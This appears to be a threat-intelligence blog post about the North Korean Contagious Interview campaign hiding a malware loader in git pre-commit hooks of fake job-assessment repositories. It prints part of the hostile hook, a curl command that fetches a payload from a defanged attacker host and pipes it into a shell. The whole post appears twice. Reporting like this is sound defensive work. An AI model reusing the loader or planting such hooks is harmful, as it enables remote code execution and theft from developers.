Lazarus Group Uses Git Hooks To Hide Malware
Contents
DPRK's Contagious Interview and TaskJacker campaign is now hiding its second-stage loader inside git hooks that download InvisibleFerret and Beavertail malware
6mile
May 6, 2026
5 min read
github
lazarus
dprk
contagious-interview
taskjacker
supply-chain
north-korea
threat-intelligence
malware
Contagious Interview pre-commit loader
The OpenSourceMalware team has spotted a fresh twist in the DPRK's Contagious Interview / TaskJacker playbook: the operators have pivoted away from stuffing their stage-2 loader into .vscode/tasks.json, package.json postinstall scripts, or fake .woff2 font files, and are now hiding it inside Git hooks. The candidate clones the "coding assessment" repo, and the loader fires before the commit object is even written.
What the hook actually does
The malicious .githooks/pre-commit script is short, which is the whole point — it's a thin loader that fingerprints the OS via uname -s, then curls or wgets a per-platform payload from precommit.vercel.app and pipes it straight into a shell or cmd.exe:
#!/bin/sh
uname_s="$(uname -s 2>/dev/null || echo unknown)"
case "$uname_s" in
Darwin)
curl -s 'hxxps://precommit[.]vercel.app/settings/mac?flag=5' | sh >/dev/null 2>&1
exit 0
…
6mile
May 6, 2026
5 min read
github
lazarus
dprk
contagious-interview
taskjacker
supply-chain
north-korea
threat-intelligence
malware
Contagious Interview pre-commit loader
The OpenSourceMalware team has spotted a fresh twist in the DPRK's Contagious Interview / TaskJacker playbook: the operators have pivoted away from stuffing their stage-2 loader into .vscode/tasks.json, package.json postinstall scripts, or fake .woff2 font files, and are now hiding it inside Git hooks. The candidate clones the "coding assessment" repo, and the loader fires before the commit object is even written.
What the hook actually does
The malicious .githooks/pre-commit script is short, which is the whole point — it's a thin loader that fingerprints the OS via uname -s, then curls or wgets a per-platform payload from precommit.vercel.app and pipes it straight into a shell or cmd.exe:
#!/bin/sh
uname_s="$(uname -s 2>/dev/null || echo unknown)"
case "$uname_s" in
Darwin)
curl -s 'hxxps://precommit[.]vercel.app/settings/mac?flag=5' | sh >/dev/null 2>&1
exit 0
…